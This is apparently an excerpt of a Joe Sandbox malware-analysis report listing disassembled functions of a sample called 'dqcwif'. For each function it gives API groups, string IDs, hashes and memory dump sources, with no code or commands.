                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                          • String ID:
                                                                                                          • API String ID: 1413079979-0
                                                                                                          • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                          • Instruction ID: 069309c05e8118143d7c9bb8126138094e15274513f27048c03e6da84a91a60f
                                                                                                          • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                          • Instruction Fuzzy Hash: 2A316F32608B8586E7648F06E490BAA77A4FB85F90F145136DF8D83B59DF3DD845CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1927845040-438819550
                                                                                                          • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                          • Instruction ID: 3db5251e47fb8612631d8d6d96d0006d3dfec07de1a3e53aa6712dd82d809f1c
                                                                                                          • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                          • Instruction Fuzzy Hash: 8D516E22608B8695EB10DB19E8602ED67B0FB46B94F500132DF5D8379EDF38ED49C710
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                                          • API String ID: 0-2187161917
                                                                                                          • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                          • Instruction ID: 046e2174aa3d05abb03311968c546052e7f79dd9c660c8c12d35c7aece6ab165
                                                                                                          • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                          • Instruction Fuzzy Hash: CAB2A272E087918AEB648F6D94602FD7BA1FB46B88F104135DB4D97A8EDF39EC418710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 4170576061-0
                                                                                                          • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                          • Instruction ID: cfe346d1b4e0ea19b7d46e312152202890c5226ce46de074d48f86238bef352f
                                                                                                          • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                          • Instruction Fuzzy Hash: 06510322B0865286EB14EB1A94646E97B90FB8BFE0F444131DF5D8779BCE7DD9018780
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 3769357847-24824748
                                                                                                          • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                          • Instruction ID: 06acd18eac36327567f6df7bf2700204f4757ee1e3c24b821a203b300fa1e164
                                                                                                          • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                          • Instruction Fuzzy Hash: C9D14D76B04A5685EB10DF6AD0A02ED37B0EB49F88B445036DF4D97B9ADF39D84AC340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _handle_error
                                                                                                          • String ID: !$VUUU$fmod
                                                                                                          • API String ID: 1757819995-2579133210
                                                                                                          • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                          • Instruction ID: 4f8c1ff3570aaf99f4a0f24952a7648b258cb2d11b20d7547809ddee1d7771bc
                                                                                                          • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                          • Instruction Fuzzy Hash: 5EB10C11A1CFC545D6B78A34A0213F6B259AFAB7D0F10D332DB5E75AA5DF2C99C28700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1286766494-0
                                                                                                          • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                          • Instruction ID: 7aa5021c951ccefc597293d351b4c25a389909e93631ed58a6ba9653518490c9
                                                                                                          • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                          • Instruction Fuzzy Hash: D7A27132A096428AE7698F28E4701F937A5FB46F84F644135EB8D87A9EDF3DD911C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                          • API String ID: 2163645468-3733053543
                                                                                                          • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                          • Instruction ID: 8f4bd06b5c9fddf24a4c22e64f870131773f51b2617f23b32209988debc89c1a
                                                                                                          • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                          • Instruction Fuzzy Hash: 5211B232B1860286F7108B2AA4605AE6251BF92B50F454135E74DC3ADFDF2CDC058780
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6B5B45C43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                          • API String ID: 389471666-631824599
                                                                                                          • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                          • Instruction ID: 798c02d7bef4c57f4253e51db87dcd5e42f7c1d78fd4eeef2218bf216384a7d1
                                                                                                          • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                          • Instruction Fuzzy Hash: 40116A32A14B5297FB149B2AD6647B933A4FB45B45F404138C74D82A9AEF3CE8A4CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                          • API String ID: 2574300362-199464113
                                                                                                          • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                          • Instruction ID: ff5b4e91112df458f22250449f8f264b7428de225aaabc3d8448c7fe224f2b02
                                                                                                          • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                          • Instruction Fuzzy Hash: 1AE0C925905B0682EF149B18A8647A823A0FB0AF58F840435DA1E86399EFBCDD99D200
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                                          • API String ID: 1385522511-109567571
                                                                                                          • Opcode ID: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                                                          • Instruction ID: 5c713961d3ae4228318acc97df24585e12ccf774b7cefb244d3a51776cb707bd
                                                                                                          • Opcode Fuzzy Hash: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                                                          • Instruction Fuzzy Hash: 47C26D37A08A8686EB608F19D4A46FA6761FB46F84F544131DB4E977AADF3DEC41C300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2733932498-0
                                                                                                          • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                          • Instruction ID: fb5f8a082a1067cf1ffe13cf6ac6672c63bf50f39494c9d462b5948e19cf002c
                                                                                                          • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                          • Instruction Fuzzy Hash: E7B15826B04B5685EB10EF2AD4A06ED2760FB4AFD4F495036DF4E9779BCE78E8418300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 1083639309-0
                                                                                                          • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                          • Instruction ID: f3e4ef5721d58e757e7f4df36cc506a6365f9c2700ec48aaea72283ddbfb61a4
                                                                                                          • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                          • Instruction Fuzzy Hash: 07419122A18A8281E710DF5AE4A45FE6764FB95F84F544036EF4E8369BDF7CE905CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                          • String ID:
                                                                                                          • API String ID: 837644225-0
                                                                                                          • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                          • Instruction ID: 0b5471d091ccce212d1b62b82d13ed6a457713d7969abba90f2a445427225b76
                                                                                                          • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                          • Instruction Fuzzy Hash: 5621BF76A14A428AEB04CF25E4147A873A5FB45F91F49413ACB0D83789DF3CEC41C750
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DEFINE$x
                                                                                                          • API String ID: 0-4035502692
                                                                                                          • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                                                          • Instruction ID: 06f1803581799dbf00382dff6d55a90f83c48719ea033ac4e044f1b88e3d95e7
                                                                                                          • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                                                          • Instruction Fuzzy Hash: 2E538B76A086568AEB64CF29C4606FC37A0FB05B88F519036DF4997789EF39ED41C702
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1385522511-0
                                                                                                          • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                                                          • Instruction ID: 58764fa3d8928a01376a0bbb5a1dda672c936b97a84e750c8585dddb37e05abc
                                                                                                          • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                                                          • Instruction Fuzzy Hash: 93826936A08A5686EB64DF19E4A86F923A1FB46F84F540036DB4D9779ADF3DEC41C300
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $[$\
                                                                                                          • API String ID: 0-3681541464
                                                                                                          • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                                          • Instruction ID: 0aa79941cea1098ad9e4d62deda0b0f9cd8143cfac3571df82381b66d8671d6f
                                                                                                          • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                                          • Instruction Fuzzy Hash: F7B27D32B046568AEB248F69C4606EC37B1FB16B48F505136CB0D9BB8AEF79ED41C741
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1502251526-0
                                                                                                          • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                          • Instruction ID: f7ef0fc1875c08e240888dc88f7fe049db9a834bfd3898dc983512ec58871b45
                                                                                                          • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                          • Instruction Fuzzy Hash: 6FD19432B1968687D728CF19F1B46AAB691F789B84F148134DB8A97749DE3CED41CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
